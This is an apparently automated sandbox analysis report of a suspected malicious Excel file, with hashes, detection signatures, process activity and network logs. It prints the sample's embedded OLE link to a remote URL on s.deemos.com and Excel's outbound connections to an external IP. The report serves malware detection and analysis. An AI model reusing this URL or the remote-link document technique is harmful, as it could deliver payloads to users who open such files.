Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MS100384UTC.xls

Overview

General Information

Sample name:MS100384UTC.xls
Analysis ID:1578870
MD5:59b463677f083cb8bf771e27162ef915
SHA1:d97b1cdbb09e2b4b93f8de903460fade41382ff0
SHA256:c306daeb532d48d6f51f35c1612d9bed38e854aa80eb86f14513c06a6bee67d7
Tags:xlsuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 6888 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 5084 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 8592 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6888, Protocol: tcp, SourceIp: 192.168.2.24, SourceIsIpv6: false, SourcePort: 49816
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 49816, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6888, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: MS100384UTC.xlsVirustotal: Detection: 13%Perma Link
Source: MS100384UTC.xlsReversingLabs: Detection: 18%
Source: MS100384UTC.xlsJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: global trafficDNS query: name: cxcs.microsoft.net
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficDNS query: name: chrome.cloudflare-dns.com
Source: global trafficDNS query: name: assets.msn.com
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49816 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49816
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.24:49818
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.24:49818 -> 14.103.79.10:443
Source: global trafficHTTP traffic detected: GET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: cxcs.microsoft.net
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Dec 2024 15:05:23 GMTContent-Type: text/html; charset=utf-8Content-Length: 4645Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15724800; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Powered-By: Next.jsETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"Vary: Accept-Encoding
Source: Primary1734707063543428900_1224D4D7-DB6A-4C3E-AFBE-A5D244BB04C1.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: MS100384UTC.xls, 24731000.0.drString found in binary or memory: https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literatureP
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816

System Summary

barindex
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE: Microsoft Excel 2007+
Source: ~DF68AAB154315B48B4.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DF0099B5197009CFC5.TMP.0.drOLE: Microsoft Excel 2007+
Source: ~DF6B820A73A99A2F8A.TMP.0.drOLE: Microsoft Excel 2007+
Source: 24731000.0.drOLE: Microsoft Excel 2007+
Source: 24731000.0.drOLE: Microsoft Excel 2007+
Source: 24731000.0.drOLE: Microsoft Excel 2007+
Source: 24731000.0.drOLE: Microsoft Excel 2007+
Source: 24731000.0.drOLE: Microsoft Excel 2007+
Source: MS100384UTC.xlsOLE indicator, VBA macros: true
Source: 24731000.0.drOLE indicator, VBA macros: true
Source: MS100384UTC.xlsStream path 'MBD006207A8/\x1Ole' : https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePS#c-":PH9MR379k6Oo~gj,/[v[D"vZc45~@<JMC1wQ>9uWmM2b4hxZWRSirFstcXuaZU5hVMV7khJOFHI4iqQUc3HPqz5dXGoP8tjwf9mEYyTvr3TSvTGH4fw0ZtryIvsdWjfP8NhBGzifiCIGCfVoymK6bRjW1FfJilyriMTUPbyX8lwwogJZdV5HMi3VFi9IJmoFF0rmFfDumWJuvmsEZcA30YVKkHtRoYHB1sEToIeLdoiPQXH4hN$FI5gV,Z
Source: 24731000.0.drStream path 'MBD006207A8/\x1Ole' : https://s.deemos.com/qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literaturePS#c-":PH9MR379k6Oo~gj,/[v[D"vZc45~@<JMC1wQ>9uWmM2b4hxZWRSirFstcXuaZU5hVMV7khJOFHI4iqQUc3HPqz5dXGoP8tjwf9mEYyTvr3TSvTGH4fw0ZtryIvsdWjfP8NhBGzifiCIGCfVoymK6bRjW1FfJilyriMTUPbyX8lwwogJZdV5HMi3VFi9IJmoFF0rmFfDumWJuvmsEZcA30YVKkHtRoYHB1sEToIeLdoiPQXH4hN$FI5gV,Z
Source: ~DF68AAB154315B48B4.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF0099B5197009CFC5.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF6B820A73A99A2F8A.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal56.winXLS@4/46@4/1
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E6E49F97.emfJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{1224D4D7-DB6A-4C3E-AFBE-A5D244BB04C1} - OProcSessId.datJump to behavior
Source: MS100384UTC.xlsOLE indicator, Workbook stream: true
Source: 24731000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: MS100384UTC.xlsVirustotal: Detection: 13%
Source: MS100384UTC.xlsReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: MS100384UTC.xlsStatic file information: File size 1123840 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DF68AAB154315B48B4.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: MS100384UTC.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
